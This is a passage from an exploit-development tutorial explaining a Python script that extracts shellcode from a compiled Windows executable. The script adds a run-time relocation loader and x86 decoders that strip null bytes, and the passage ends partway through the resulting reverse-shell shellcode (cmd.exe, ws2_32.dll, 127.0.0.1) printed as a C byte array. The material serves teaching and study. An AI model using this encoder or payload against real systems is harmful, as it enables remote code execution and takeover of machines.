# Extracts the relocations for the shellcode and the referenced strings in .rdata.
        relocs = []
        addr_to_strings = {}
        for rel_data in pe.DIRECTORY_ENTRY_BASERELOC:
            for entry in rel_data.entries[:-1]:         # the last element's rva is the base_rva (why?)
                if shellcode_start <= entry.rva < shellcode_end:
                    # The relocation location is inside the shellcode.
                    relocs.append(entry.rva - shellcode_start)      # offset relative to the start of shellcode
                    string_va = pe.get_dword_at_rva(entry.rva)
                    string_rva = string_va - pe.OPTIONAL_HEADER.ImageBase
                    if string_rva < rdata_start or string_rva >= rdata_end:
                        raise Exception('shellcode references a section other than .rdata')
                    str = get_cstring(rdata, string_rva - rdata_start)
                    if str is None:
                        raise Exception('Cannot extract string from .rdata')
                    addr_to_strings[string_va] = str
 
        return (shellcode, relocs, addr_to_strings)

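pe.DIRECTORY_ENTRY_BASERELOC is a list of data structures, each of which has a field named entries that holds a list of relocations. First we check whether the current relocation lies within the shellcode. If it does, we do the following:

1. We append to relocs the offset of the relocation relative to the start of the shellcode.

2. We read the DWORD located at that offset in the shellcode and check that this DWORD points to data in .rdata.

3. We extract from .rdata the null-terminated string that starts at the location found in (2).

4. We add the string to addr_to_strings.

Note that:

i. relocs contains the offsets of the relocations within the shellcode, i.e. the offsets of the DWORDs within the shellcode that need to be fixed so that they point to the strings;

ii. addr_to_strings is a dictionary that associates the addresses found in (2) with the actual strings.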
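
Step 3 relies on a helper, get_cstring, whose body is not shown in this part of the article. The following Python 3 sketch shows what such a helper might look like. The name extract_cstring is hypothetical, it works on bytes rather than on Python 2 strings, and it assumes (as the s[:-1] in main suggests) that the returned string keeps its terminating null byte.

```python
def extract_cstring(data, offset):
    """Return the bytes from offset up to and including the first null byte,
    or None if offset is out of range or no terminator is found."""
    if offset < 0 or offset >= len(data):
        return None
    end = data.find(b'\x00', offset)
    if end == -1:
        return None
    return data[offset:end + 1]


# Toy stand-in for the contents of .rdata.
rdata = b'abc\x00cmd.exe\x00tail'
print(extract_cstring(rdata, 4))
```

Keeping the terminator matters because the string is later appended verbatim to the shellcode, where the code expects it to be null-terminated.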

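Adding the loader to the shellcode

The idea is to append the strings contained in addr_to_strings to the end of our shellcode and then make our code reference those strings.

Unfortunately, the code -> strings linking must be done at run time because we don't know the starting address of the shellcode. For this we need to prepend a sort of "loader" that fixes the shellcode at run time. After the transformation, the shellcode consists of the loader, followed by the original shellcode, the offsets off1|off2|..., and finally the strings str1|str2|....

offX are DWORDs that point to the relocations in the original shellcode, i.e. to the locations that need to be fixed. The loader fixes these locations so that they point to the correct strings strX. To see exactly how this works, try to understand the following code: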

def add_loader_to_shellcode(shellcode, relocs, addr_to_strings):
    if len(relocs) == 0:
        return shellcode                # there are no relocations
 
    # The format of the new shellcode is:
    #       call    here
    #   here:
    #       ...
    #   shellcode_start:
    #       <shellcode>         (contains offsets to strX (offsets are from "here" label))
    #   relocs:
    #       off1|off2|...       (offsets to relocations (offsets are from "here" label))
    #       str1|str2|...
 
    delta = 21                                      # shellcode_start - here
 
    # Builds the first part (up to and not including the shellcode).
    x = dword_to_bytes(delta + len(shellcode))
    y = dword_to_bytes(len(relocs))
    code = [
        0xE8, 0x00, 0x00, 0x00, 0x00,               #   CALL here
                                                    # here:
        0x5E,                                       #   POP ESI
        0x8B, 0xFE,                                 #   MOV EDI, ESI
        0x81, 0xC6, x[0], x[1], x[2], x[3],         #   ADD ESI, shellcode_start + len(shellcode) - here
        0xB9, y[0], y[1], y[2], y[3],               #   MOV ECX, len(relocs)
        0xFC,                                       #   CLD
                                                    # again:
        0xAD,                                       #   LODSD
        0x01, 0x3C, 0x07,                           #   ADD [EDI+EAX], EDI
        0xE2, 0xFA                                  #   LOOP again
                                                    # shellcode_start:
    ]
 
    # Builds the final part (offX and strX).
    offset = delta + len(shellcode) + len(relocs) * 4           # offset from "here" label
    final_part = [dword_to_string(r + delta) for r in relocs]
    addr_to_offset = {}
    for addr in addr_to_strings.keys():
        str = addr_to_strings[addr]
        final_part.append(str)
        addr_to_offset[addr] = offset
        offset += len(str)
 
    # Fixes the shellcode so that the pointers referenced by relocs point to the
    # string in the final part.
    byte_shellcode = [ord(c) for c in shellcode]
    for off in relocs:
        addr = bytes_to_dword(byte_shellcode[off:off+4])
        byte_shellcode[off:off+4] = dword_to_bytes(addr_to_offset[addr])
 
    return ''.join([chr(b) for b in (code + byte_shellcode)]) + ''.join(final_part)

Let's have a look at the loader:

CALL here                   ; PUSH EIP+5; JMP here
  here:
    POP ESI                     ; ESI = address of "here"
    MOV EDI, ESI                ; EDI = address of "here"
    ADD ESI, shellcode_start + len(shellcode) - here        ; ESI = address of off1
    MOV ECX, len(relocs)        ; ECX = number of locations to fix
    CLD                         ; tells LODSD to go forwards
  again:
    LODSD                       ; EAX = offX; ESI += 4
    ADD [EDI+EAX], EDI          ; fixes location within shellcode
    LOOP again                  ; DEC ECX; if ECX > 0 then JMP again
  shellcode_start:
    <shellcode>
  relocs:
    off1|off2|...
    str1|str2|...

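First, a CALL is used to get the absolute address of here in memory. The loader uses this information to fix the offsets in the original shellcode. ESI points to off1, so LODSD is used to read the offsets one by one. The instruction

ADD [EDI+EAX], EDI

fixes the locations within the shellcode. EAX is the current offX, the offset of a location relative to here, so EDI+EAX is the absolute address of that location. The DWORD at that location contains the offset of the correct string relative to here. By adding EDI to that DWORD, we turn it into the absolute address of the string. When the loader has finished, the shellcode, now fixed, is executed.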
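
To make the fix-up concrete, here is a small Python 3 simulation of the loader loop. It is a sketch under stated assumptions, not the article's code: simulate_loader is a hypothetical name, the buffer starts at the here label, the loader body is replaced by 21 filler bytes, the "shellcode" is a single push instruction, and the address HERE is made up.

```python
import struct


def simulate_loader(image, here_addr, table_offset, count):
    """Mimic the LODSD / ADD [EDI+EAX], EDI loop on a copy of image.

    image starts at the "here" label, so index 0 corresponds to here_addr.
    """
    mem = bytearray(image)
    for i in range(count):
        # LODSD: read the next offX from the table.
        (off,) = struct.unpack_from('<I', mem, table_offset + 4 * i)
        # ADD [EDI+EAX], EDI: turn the stored offset into an absolute address.
        (value,) = struct.unpack_from('<I', mem, off)
        struct.pack_into('<I', mem, off, (value + here_addr) & 0xFFFFFFFF)
    return bytes(mem)


DELTA = 21                                    # shellcode_start - here
loader_body = b'\x90' * DELTA                 # filler standing in for the loader
string = b'cmd.exe\x00'
string_offset = DELTA + 5 + 4                 # loader + shellcode + one table entry
shellcode = b'\x68' + struct.pack('<I', string_offset)   # push <offset of string>
table = struct.pack('<I', DELTA + 1)          # operand of the push, relative to here
image = loader_body + shellcode + table + string

HERE = 0x00501005                             # hypothetical run-time address of "here"
fixed = simulate_loader(image, HERE, DELTA + len(shellcode), 1)
(pushed,) = struct.unpack_from('<I', fixed, DELTA + 1)
print(hex(pushed), fixed[pushed - HERE:pushed - HERE + len(string)])
```

After the loop, the operand of the push holds HERE plus the offset of the string, which is exactly the absolute address the original code expected.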

To conclude, add_loader_to_shellcode is called only if there are relocations. You can see this in the main function:

<snip>
    if len(relocs) != 0:
        print('Found %d reference(s) to %d string(s) in .rdata' % (len(relocs), len(addr_to_strings)))
        print('Strings:')
        for s in addr_to_strings.values():
            print('  ' + s[:-1])
        print('')
        shellcode = add_loader_to_shellcode(shellcode, relocs, addr_to_strings)
    else:
        print('No relocations found')
<snip>

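Removing `null` bytes from the `shellcode` (I)

We wrote the following two functions to remove null bytes:

1. get_fixed_shellcode_single_block
2. get_fixed_shellcode

The first function produces shorter code but doesn't always work, so it should be tried first. The second function produces longer code but works for any shellcode whose table of missing bytes stays small enough (it returns None otherwise).

Let's look at get_fixed_shellcode_single_block first. Here is its definition: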

def get_fixed_shellcode_single_block(shellcode):
    '''
    Returns a version of shellcode without null bytes or None if the
    shellcode can't be fixed.
    If this function fails, use get_fixed_shellcode().
    '''
 
    # Finds one non-null byte not present, if any.
    bytes = set([ord(c) for c in shellcode])
    missing_bytes = [b for b in range(1, 256) if b not in bytes]
    if len(missing_bytes) == 0:
        return None                             # shellcode can't be fixed
    missing_byte = missing_bytes[0]
 
    (xor1, xor2) = get_xor_values(len(shellcode))
 
    code = [
        0xE8, 0xFF, 0xFF, 0xFF, 0xFF,                       #   CALL $ + 4
                                                            # here:
        0xC0,                                               #   (FF)C0 = INC EAX
        0x5F,                                               #   POP EDI
        0xB9, xor1[0], xor1[1], xor1[2], xor1[3],           #   MOV ECX, <xor value 1 for shellcode len>
        0x81, 0xF1, xor2[0], xor2[1], xor2[2], xor2[3],     #   XOR ECX, <xor value 2 for shellcode len>
        0x83, 0xC7, 29,                                     #   ADD EDI, shellcode_begin - here
        0x33, 0xF6,                                         #   XOR ESI, ESI
        0xFC,                                               #   CLD
                                                            # loop1:
        0x8A, 0x07,                                         #   MOV AL, BYTE PTR [EDI]
        0x3C, missing_byte,                                 #   CMP AL, <missing byte>
        0x0F, 0x44, 0xC6,                                   #   CMOVE EAX, ESI
        0xAA,                                               #   STOSB
        0xE2, 0xF6                                          #   LOOP loop1
                                                            # shellcode_begin:
    ]
 
    return ''.join([chr(x) for x in code]) + shellcode.replace('\0', chr(missing_byte))

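The idea is simple. We analyze the shellcode byte by byte and check whether there is a missing value, i.e. a value that never appears in the shellcode. Let's say this value is 0x14. If we replace every 0x00 in the shellcode with 0x14, the shellcode no longer contains null bytes, but it can't run because it has been modified. The last step is to prepend a decoder to the shellcode which, at run time, restores the null bytes before the original shellcode is executed. Here it is: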

CALL $ + 4                                  ; PUSH "here"; JMP "here"-1
here:
  (FF)C0 = INC EAX                            ; not important: just a NOP
  POP EDI                                     ; EDI = "here"
  MOV ECX, <xor value 1 for shellcode len>
  XOR ECX, <xor value 2 for shellcode len>    ; ECX = shellcode length
  ADD EDI, shellcode_begin - here             ; EDI = absolute address of original shellcode
  XOR ESI, ESI                                ; ESI = 0
  CLD                                         ; tells STOSB to go forwards
loop1:
  MOV AL, BYTE PTR [EDI]                      ; AL = current byte of the shellcode
  CMP AL, <missing byte>                      ; is AL the special byte?
  CMOVE EAX, ESI                              ; if AL is the special byte, then EAX = 0
  STOSB                                       ; overwrite the current byte of the shellcode with AL
  LOOP loop1                                  ; DEC ECX; if ECX > 0 then JMP loop1
shellcode_begin:

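There are two important details to discuss. First of all, this code can't contain null bytes itself, because then we would need another piece of code to remove them.

As you can see, the CALL instruction doesn't jump to here, because otherwise its opcode would have been

E8 00 00 00 00               #   CALL here

which contains four null bytes. Since the CALL instruction is 5 bytes long, CALL here is equivalent to CALL $+5. The trick to get rid of the null bytes is to use CALL $+4:

E8 FF FF FF FF               #   CALL $+4

This CALL skips 4 bytes and jumps to the last FF of the CALL itself. The CALL is followed by the byte C0, so the instruction executed right after the CALL is INC EAX, whose opcode is FF C0. Note that the value pushed by the CALL is still the absolute address of the here label.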
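
The target of a near CALL is the address of the next instruction plus a signed 32-bit displacement, which is why FF FF FF FF (that is, -1) lands on the last byte of the CALL itself. The following Python 3 sketch works this out; call_target and return_address are hypothetical helper names and the address 1000h is arbitrary.

```python
import struct

CALL_LEN = 5   # E8 opcode + 32-bit relative displacement


def call_target(call_addr, encoding):
    """Address a near CALL (opcode E8) located at call_addr jumps to."""
    assert encoding[0] == 0xE8 and len(encoding) == CALL_LEN
    (rel,) = struct.unpack('<i', encoding[1:5])        # signed displacement
    return (call_addr + CALL_LEN + rel) & 0xFFFFFFFF


def return_address(call_addr):
    """Value the CALL pushes on the stack: the address right after it."""
    return call_addr + CALL_LEN


addr = 0x1000                                           # arbitrary example address
plain = bytes([0xE8, 0x00, 0x00, 0x00, 0x00])           # CALL here (= CALL $+5)
trick = bytes([0xE8, 0xFF, 0xFF, 0xFF, 0xFF])           # CALL $+4
print(hex(call_target(addr, plain)), hex(call_target(addr, trick)), hex(return_address(addr)))
```

Both encodings push the same return address (the here label); only the jump target differs by one byte, and the second encoding contains no null bytes.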

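The second trick is used to avoid null bytes in this pair of instructions:

MOV ECX, <xor value 1 for shellcode len>
XOR ECX, <xor value 2 for shellcode len>

We could have just used

MOV ECX, <shellcode len>

but this would have produced null bytes. In fact, for a shellcode of length 0x400, we would have

B9 00 04 00 00        MOV ECX, 400h

which contains 3 null bytes.

To avoid that, we choose a non-null byte that doesn't appear in 00000400h. Let's say we choose 0x01. Now we compute

<xor value 1 for shellcode len> = 00000400h xor 01010101h = 01010501h
<xor value 2 for shellcode len> = 01010101h

Neither value contains null bytes, so the opcodes of the two instructions are null-free, and the XOR restores the original value 400h.

The two instructions become:

B9 01 05 01 01        MOV ECX, 01010501h
81 F1 01 01 01 01     XOR ECX, 01010101h

The xor values are computed by the function get_xor_values.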
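
The computation can be reproduced with a few lines of Python 3. This is a self-contained sketch in the spirit of get_xor_values, not a copy of it: the name xor_pair is hypothetical and struct is used in place of the script's dword_to_bytes helper.

```python
import struct


def xor_pair(value):
    """Return (x, y) as 4-byte little-endian strings such that
    x xor y == value and neither x nor y contains a null byte."""
    raw = struct.pack('<I', value)
    # Any non-null byte that does not occur in value works as the mask.
    missing = next(b for b in range(1, 256) if b not in raw)
    x = bytes(b ^ missing for b in raw)    # b != missing, so b ^ missing != 0
    y = bytes([missing]) * 4
    return x, y


x, y = xor_pair(0x400)
print(x.hex(), y.hex())
```

For 0x400 the first missing non-null byte is 0x01, so the sketch yields the same two operands as the worked example above.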

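Having said that, the decoder is easy to understand: it walks through the shellcode byte by byte and overwrites with a null byte every byte that contains the special value (0x14 in our previous example).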
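
The encode/decode round trip can be modelled in Python 3 without any assembly. The function names below are hypothetical and the sample bytes are made up; decode_single_block only mimics what the decoder stub does at run time.

```python
def encode_single_block(shellcode):
    """Replace every null byte with a value that never occurs in shellcode.

    Returns (missing_byte, encoded) or None if every non-null value is used.
    """
    present = set(shellcode)
    missing = next((b for b in range(1, 256) if b not in present), None)
    if missing is None:
        return None
    return missing, shellcode.replace(b'\x00', bytes([missing]))


def decode_single_block(encoded, missing):
    """What the decoder does at run time: restore the null bytes."""
    return bytes(0 if b == missing else b for b in encoded)


sample = bytes([0x68, 0x00, 0x04, 0x00, 0x00, 0x01, 0x02])   # made-up bytes
missing, encoded = encode_single_block(sample)
print(hex(missing), encoded.hex(), decode_single_block(encoded, missing) == sample)
```

The round trip is lossless precisely because the chosen value never occurs in the original bytes, so every occurrence in the encoded form must have been a null byte.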

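Removing null bytes from the shellcode (II)

The method above can fail because we may be unable to find a byte value that never appears in the shellcode. If that happens, we need to use get_fixed_shellcode, which is a little more complex.

The idea is to divide the shellcode into blocks of 254 bytes. Note that each block must have a "missing byte", because a byte can take 255 non-zero values and a block holds only 254 bytes. We could choose a missing byte for each block and handle each block individually, but this wouldn't be very space efficient: for a shellcode of 254*N bytes we would need to store N "missing bytes" before or after the shellcode (the decoder needs to know the missing bytes). A better approach is to use the same "missing byte" for as many 254-byte blocks as possible. We start from the beginning of the shellcode and keep adding blocks to the current group for as long as at least one byte value is missing from all of them; when no such value is left, we start a new group at that block, and so on until the last block has been processed. In the end, we have a list of <missing_byte, num_blocks> pairs: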

[(missing_byte1, num_blocks1), (missing_byte2, num_blocks2), ...]

I decided to restrict num_blocksX to a single byte, so num_blocksX is between 1 and 255.

Here is the part of get_fixed_shellcode that splits the shellcode into groups of blocks:

def get_fixed_shellcode(shellcode):
    '''
    Returns a version of shellcode without null bytes. This version divides
    the shellcode into multiple blocks and should be used only if
    get_fixed_shellcode_single_block() doesn't work with this shellcode.
    '''
 
    # The format of bytes_blocks is
    #   [missing_byte1, number_of_blocks1,
    #    missing_byte2, number_of_blocks2, ...]
    # where missing_byteX is the value used to overwrite the null bytes in the
    # shellcode, while number_of_blocksX is the number of 254-byte blocks where
    # to use the corresponding missing_byteX.
    bytes_blocks = []
    shellcode_len = len(shellcode)
    i = 0
    while i < shellcode_len:
        num_blocks = 0
        missing_bytes = list(range(1, 256))
 
        # Tries to find as many 254-byte contiguous blocks as possible which misses at
        # least one non-null value. Note that a single 254-byte block always misses at
        # least one non-null value.
        while True:
            if i >= shellcode_len or num_blocks == 255:
                bytes_blocks += [missing_bytes[0], num_blocks]
                break
            bytes = set([ord(c) for c in shellcode[i:i+254]])
            new_missing_bytes = [b for b in missing_bytes if b not in bytes]
            if len(new_missing_bytes) != 0:         # new block added
                missing_bytes = new_missing_bytes
                num_blocks += 1
                i += 254
            else:
                bytes_blocks += [missing_bytes[0], num_blocks]
                break
<snip>

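As before, we need to discuss the "decoder" that is prepended to the shellcode. This decoder is a bit longer than the previous one, but the principle is the same.

Here is the code: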

code = ([
    0xEB, len(bytes_blocks)] +                          #   JMP SHORT skip_bytes
                                                        # bytes:
    bytes_blocks + [                                    #   ...
                                                        # skip_bytes:
    0xE8, 0xFF, 0xFF, 0xFF, 0xFF,                       #   CALL $ + 4
                                                        # here:
    0xC0,                                               #   (FF)C0 = INC EAX
    0x5F,                                               #   POP EDI
    0xB9, xor1[0], xor1[1], xor1[2], xor1[3],           #   MOV ECX, <xor value 1 for shellcode len>
    0x81, 0xF1, xor2[0], xor2[1], xor2[2], xor2[3],     #   XOR ECX, <xor value 2 for shellcode len>
    0x8D, 0x5F, -(len(bytes_blocks) + 5) & 0xFF,        #   LEA EBX, [EDI + (bytes - here)]
    0x83, 0xC7, 0x30,                                   #   ADD EDI, shellcode_begin - here
                                                        # loop1:
    0xB0, 0xFE,                                         #   MOV AL, 0FEh
    0xF6, 0x63, 0x01,                                   #   MUL AL, BYTE PTR [EBX+1]
    0x0F, 0xB7, 0xD0,                                   #   MOVZX EDX, AX
    0x33, 0xF6,                                         #   XOR ESI, ESI
    0xFC,                                               #   CLD
                                                        # loop2:
    0x8A, 0x07,                                         #   MOV AL, BYTE PTR [EDI]
    0x3A, 0x03,                                         #   CMP AL, BYTE PTR [EBX]
    0x0F, 0x44, 0xC6,                                   #   CMOVE EAX, ESI
    0xAA,                                               #   STOSB
    0x49,                                               #   DEC ECX
    0x74, 0x07,                                         #   JE shellcode_begin
    0x4A,                                               #   DEC EDX
    0x75, 0xF2,                                         #   JNE loop2
    0x43,                                               #   INC EBX
    0x43,                                               #   INC EBX
    0xEB, 0xE3                                          #   JMP loop1
                                                        # shellcode_begin:
])
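
The two "xor value" immediates let the decoder load the shellcode length into ECX without embedding any null byte. The script's own way of choosing them is not shown in this section, so the following is only a minimal Python 3 sketch under one assumption: `xor2` is a repeated non-zero fill byte and `xor1 = length ^ xor2`. The name `split_length` is hypothetical.

```python
import struct


def split_length(length):
    """Return (xor1, xor2) as 4-byte little-endian strings without null bytes,
    such that xor1 ^ xor2 == length. Hypothetical helper, not the script's code."""
    if not 0 <= length <= 0xFFFFFFFF:
        raise ValueError("length must fit in 32 bits")
    for fill in range(1, 256):
        xor2 = fill * 0x01010101          # every byte of xor2 equals 'fill'
        xor1 = length ^ xor2
        xor1_bytes = struct.pack("<I", xor1)
        # A byte of xor1 is null only when the matching length byte equals 'fill'.
        if 0 not in xor1_bytes:
            return xor1_bytes, struct.pack("<I", xor2)
    raise ValueError("no suitable fill byte")  # unreachable: at most 4 fills can fail


xor1, xor2 = split_length(681)
print(xor1.hex(), xor2.hex())
```

With a length of 681 this sketch yields the byte sequences `a8 03 01 01` and `01 01 01 01`, which are the same immediates that appear in the sample output later in this section.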

bytes_blocks is the array:

[missing_byte1, num_blocks1, missing_byte2, num_blocks2, ...]

This is the list we discussed earlier, except that it is flattened instead of being stored as pairs.
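
To make the layout of the flattened array concrete, here is a self-contained Python 3 sketch of how such a list could be built. It mirrors the loop fragment shown earlier, but the outer loop and the function name `find_bytes_blocks` are assumptions, since the full function is not visible in this section. In Python 3, iterating over `bytes` already yields integers, so `ord()` is not needed.

```python
def find_bytes_blocks(shellcode):
    """Return [missing_byte1, num_blocks1, missing_byte2, num_blocks2, ...].

    Each pair describes one chunk made of num_blocks 254-byte blocks in which
    the non-null value missing_byte never occurs.
    """
    bytes_blocks = []
    i = 0
    while i < len(shellcode):
        num_blocks = 0
        missing_bytes = list(range(1, 256))
        # Grow the chunk block by block while at least one non-null value is
        # still absent from all of it. A single 254-byte block can hold at most
        # 254 distinct values, so the first block always qualifies.
        while True:
            if i >= len(shellcode) or num_blocks == 255:
                bytes_blocks += [missing_bytes[0], num_blocks]
                break
            present = set(shellcode[i:i + 254])
            still_missing = [b for b in missing_bytes if b not in present]
            if still_missing:                   # new block added
                missing_bytes = still_missing
                num_blocks += 1
                i += 254
            else:                               # chunk is complete
                bytes_blocks += [missing_bytes[0], num_blocks]
                break
    return bytes_blocks


# 254 distinct values, then 0xFF, then ten null bytes: two chunks are needed.
sample = bytes(range(1, 255)) + bytes([255]) + bytes(10)
print(find_bytes_blocks(sample))
```

Limiting `num_blocks` to 255 keeps each count within a single byte, which is what the decoder reads with `BYTE PTR [EBX+1]`.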

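Notice that the code starts with a JMP SHORT that skips bytes_blocks. For this to work, len(bytes_blocks) must be less than or equal to 0x7F. But as you can see, len(bytes_blocks) also appears in another instruction: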

0x8D, 0x5F, -(len(bytes_blocks) + 5) & 0xFF,        #   LEA EBX, [EDI + (bytes - here)]

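Here the displacement -(len(bytes_blocks) + 5) must fit in a signed 8-bit value, which requires len(bytes_blocks) to be less than or equal to 0x7F - 5, so this is the binding condition. Here is what happens when the condition is violated: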

if len(bytes_blocks) > 0x7f - 5:
    # Can't assemble "LEA EBX, [EDI + (bytes-here)]" or "JMP skip_bytes".
    return None
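
The reason for the limit can be checked with a little arithmetic. The Python 3 sketch below encodes the displacement exactly as the listing does, `-(len(bytes_blocks) + 5) & 0xFF`, and then reads it back the way the CPU sign-extends an 8-bit displacement. The helper names `lea_disp8` and `as_signed8` are made up for this illustration.

```python
def lea_disp8(table_len):
    """Displacement byte for LEA EBX, [EDI + (bytes - here)], as in the listing."""
    return -(table_len + 5) & 0xFF


def as_signed8(value):
    """Interpret a byte as a sign-extended 8-bit displacement."""
    return value - 0x100 if value & 0x80 else value


for table_len in (4, 0x7F - 5, 0x7F):
    encoded = lea_disp8(table_len)
    decoded = as_signed8(encoded)
    wanted = -(table_len + 5)
    print(table_len, hex(encoded), decoded, "ok" if decoded == wanted else "WRONG")
```

For the first two lengths the decoded displacement matches the intended one. For a length of 0x7F the encoded byte no longer has its sign bit set, so EBX would point forwards instead of back to the table.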

Let's review the code in more detail:

JMP SHORT skip_bytes
bytes:
  ...
skip_bytes:
  CALL $ + 4                                  ; PUSH "here"; JMP "here"-1
here:
  (FF)C0 = INC EAX                            ; not important: just a NOP
  POP EDI                                     ; EDI = absolute address of "here"
  MOV ECX, <xor value 1 for shellcode len>
  XOR ECX, <xor value 2 for shellcode len>    ; ECX = shellcode length
  LEA EBX, [EDI + (bytes - here)]             ; EBX = absolute address of "bytes"
  ADD EDI, shellcode_begin - here             ; EDI = absolute address of the shellcode
loop1:
  MOV AL, 0FEh                                ; AL = 254
  MUL AL, BYTE PTR [EBX+1]                    ; AX = 254 * current num_blocksX = num bytes
  MOVZX EDX, AX                               ; EDX = num bytes of the current chunk
  XOR ESI, ESI                                ; ESI = 0
  CLD                                         ; tells STOSB to go forwards
loop2:
  MOV AL, BYTE PTR [EDI]                      ; AL = current byte of shellcode
  CMP AL, BYTE PTR [EBX]                      ; is AL the missing byte for the current chunk?
  CMOVE EAX, ESI                              ; if it is, then EAX = 0
  STOSB                                       ; replaces the current byte of the shellcode with AL
  DEC ECX                                     ; ECX -= 1
  JE shellcode_begin                          ; if ECX == 0, then we're done!
  DEC EDX                                     ; EDX -= 1
  JNE loop2                                   ; if EDX != 0, then we keep working on the current chunk
  INC EBX                                     ; EBX += 1  (moves to next pair...
  INC EBX                                     ; EBX += 1   ... missing_bytes, num_blocks)
  JMP loop1                                   ; starts working on the next chunk
shellcode_begin:
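
To follow the two loops without a debugger, the decoder can be modeled in a few lines of Python 3. This is only a sketch of the logic in the listing above, with variables named after the registers they stand for. It works on list indices instead of addresses and assumes a non-empty buffer whose table matches it.

```python
def decode(encoded, bytes_blocks):
    """Model of the decoder: restore the null bytes in 'encoded'."""
    buf = bytearray(encoded)
    ecx = len(buf)      # ECX: bytes still to process
    edi = 0             # EDI: index of the current shellcode byte
    ebx = 0             # EBX: index of the current (missing_byte, num_blocks) pair
    while True:                                         # loop1
        # MUL leaves 254 * num_blocks in AX; MOVZX copies it to EDX.
        edx = (0xFE * bytes_blocks[ebx + 1]) & 0xFFFF
        while True:                                     # loop2
            if buf[edi] == bytes_blocks[ebx]:           # CMP AL, BYTE PTR [EBX]
                buf[edi] = 0                            # CMOVE EAX, ESI ; STOSB
            edi += 1                                    # STOSB advances EDI
            ecx -= 1
            if ecx == 0:                                # JE shellcode_begin
                return bytes(buf)
            edx -= 1
            if edx == 0:                                # chunk finished
                break
        ebx += 2                                        # INC EBX ; INC EBX


print(decode(b"\x31\x05\xc0\x05", [5, 1]).hex())
```

Since the largest product is 254 * 255 = 64770, the chunk length always fits in AX, which is why a single 8-bit MUL is enough.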

Testing the script

This is the easy part! If we run the script without any arguments, it prints:

Shellcode Extractor by Massimiliano Tomassoli (2015)

Usage:
  sce.py <exe file> <map file>

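As you may remember, we also told the VS 2013 linker to produce a map file. Just call the script with the path to the exe file and the path to the map file. Here is what we get for our reverse shell: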

Shellcode Extractor by Massimiliano Tomassoli (2015)

Extracting shellcode length from "mapfile"...
shellcode length: 614
Extracting shellcode from "shellcode.exe" and analyzing relocations...
Found 3 reference(s) to 3 string(s) in .rdata
Strings:
  ws2_32.dll
  cmd.exe
  127.0.0.1

Fixing the shellcode...
final shellcode length: 715

char shellcode[] =
"\xe8\xff\xff\xff\xff\xc0\x5f\xb9\xa8\x03\x01\x01\x81\xf1\x01\x01"
"\x01\x01\x83\xc7\x1d\x33\xf6\xfc\x8a\x07\x3c\x05\x0f\x44\xc6\xaa"
"\xe2\xf6\xe8\x05\x05\x05\x05\x5e\x8b\xfe\x81\xc6\x7b\x02\x05\x05"
"\xb9\x03\x05\x05\x05\xfc\xad\x01\x3c\x07\xe2\xfa\x55\x8b\xec\x83"
"\xe4\xf8\x81\xec\x24\x02\x05\x05\x53\x56\x57\xb9\x8d\x10\xb7\xf8"
"\xe8\xa5\x01\x05\x05\x68\x87\x02\x05\x05\xff\xd0\xb9\x40\xd5\xdc"
"\x2d\xe8\x94\x01\x05\x05\xb9\x6f\xf1\xd4\x9f\x8b\xf0\xe8\x88\x01"
"\x05\x05\xb9\x82\xa1\x0d\xa5\x8b\xf8\xe8\x7c\x01\x05\x05\xb9\x70"
"\xbe\x1c\x23\x89\x44\x24\x18\xe8\x6e\x01\x05\x05\xb9\xd1\xfe\x73"
"\x1b\x89\x44\x24\x0c\xe8\x60\x01\x05\x05\xb9\xe2\xfa\x1b\x01\xe8"
"\x56\x01\x05\x05\xb9\xc9\x53\x29\xdc\x89\x44\x24\x20\xe8\x48\x01"
"\x05\x05\xb9\x6e\x85\x1c\x5c\x89\x44\x24\x1c\xe8\x3a\x01\x05\x05"
"\xb9\xe0\x53\x31\x4b\x89\x44\x24\x24\xe8\x2c\x01\x05\x05\xb9\x98"
"\x94\x8e\xca\x8b\xd8\xe8\x20\x01\x05\x05\x89\x44\x24\x10\x8d\x84"
"\x24\xa0\x05\x05\x05\x50\x68\x02\x02\x05\x05\xff\xd6\x33\xc9\x85"
"\xc0\x0f\x85\xd8\x05\x05\x05\x51\x51\x51\x6a\x06\x6a\x01\x6a\x02"
"\x58\x50\xff\xd7\x8b\xf0\x33\xff\x83\xfe\xff\x0f\x84\xc0\x05\x05"
"\x05\x8d\x44\x24\x14\x50\x57\x57\x68\x9a\x02\x05\x05\xff\x54\x24"
"\x2c\x85\xc0\x0f\x85\xa8\x05\x05\x05\x6a\x02\x57\x57\x6a\x10\x8d"
"\x44\x24\x58\x50\x8b\x44\x24\x28\xff\x70\x10\xff\x70\x18\xff\x54"
"\x24\x40\x6a\x02\x58\x66\x89\x44\x24\x28\xb8\x05\x7b\x05\x05\x66"
"\x89\x44\x24\x2a\x8d\x44\x24\x48\x50\xff\x54\x24\x24\x57\x57\x57"
"\x57\x89\x44\x24\x3c\x8d\x44\x24\x38\x6a\x10\x50\x56\xff\x54\x24"
"\x34\x85\xc0\x75\x5c\x6a\x44\x5f\x8b\xcf\x8d\x44\x24\x58\x33\xd2"
"\x88\x10\x40\x49\x75\xfa\x8d\x44\x24\x38\x89\x7c\x24\x58\x50\x8d"
"\x44\x24\x5c\xc7\x84\x24\x88\x05\x05\x05\x05\x01\x05\x05\x50\x52"
"\x52\x52\x6a\x01\x52\x52\x68\x92\x02\x05\x05\x52\x89\xb4\x24\xc0"
"\x05\x05\x05\x89\xb4\x24\xbc\x05\x05\x05\x89\xb4\x24\xb8\x05\x05"
"\x05\xff\x54\x24\x34\x6a\xff\xff\x74\x24\x3c\xff\x54\x24\x18\x33"
"\xff\x57\xff\xd3\x5f\x5e\x33\xc0\x5b\x8b\xe5\x5d\xc3\x33\xd2\xeb"
"\x10\xc1\xca\x0d\x3c\x61\x0f\xbe\xc0\x7c\x03\x83\xe8\x20\x03\xd0"
"\x41\x8a\x01\x84\xc0\x75\xea\x8b\xc2\xc3\x55\x8b\xec\x83\xec\x14"
"\x53\x56\x57\x89\x4d\xf4\x64\xa1\x30\x05\x05\x05\x89\x45\xfc\x8b"
"\x45\xfc\x8b\x40\x0c\x8b\x40\x14\x8b\xf8\x89\x45\xec\x8d\x47\xf8"
"\x8b\x3f\x8b\x70\x18\x85\xf6\x74\x4f\x8b\x46\x3c\x8b\x5c\x30\x78"
"\x85\xdb\x74\x44\x8b\x4c\x33\x0c\x03\xce\xe8\x9e\xff\xff\xff\x8b"
"\x4c\x33\x20\x89\x45\xf8\x03\xce\x33\xc0\x89\x4d\xf0\x89\x45\xfc"
"\x39\x44\x33\x18\x76\x22\x8b\x0c\x81\x03\xce\xe8\x7d\xff\xff\xff"
"\x03\x45\xf8\x39\x45\xf4\x74\x1e\x8b\x45\xfc\x8b\x4d\xf0\x40\x89"
"\x45\xfc\x3b\x44\x33\x18\x72\xde\x3b\x7d\xec\x75\xa0\x33\xc0\x5f"
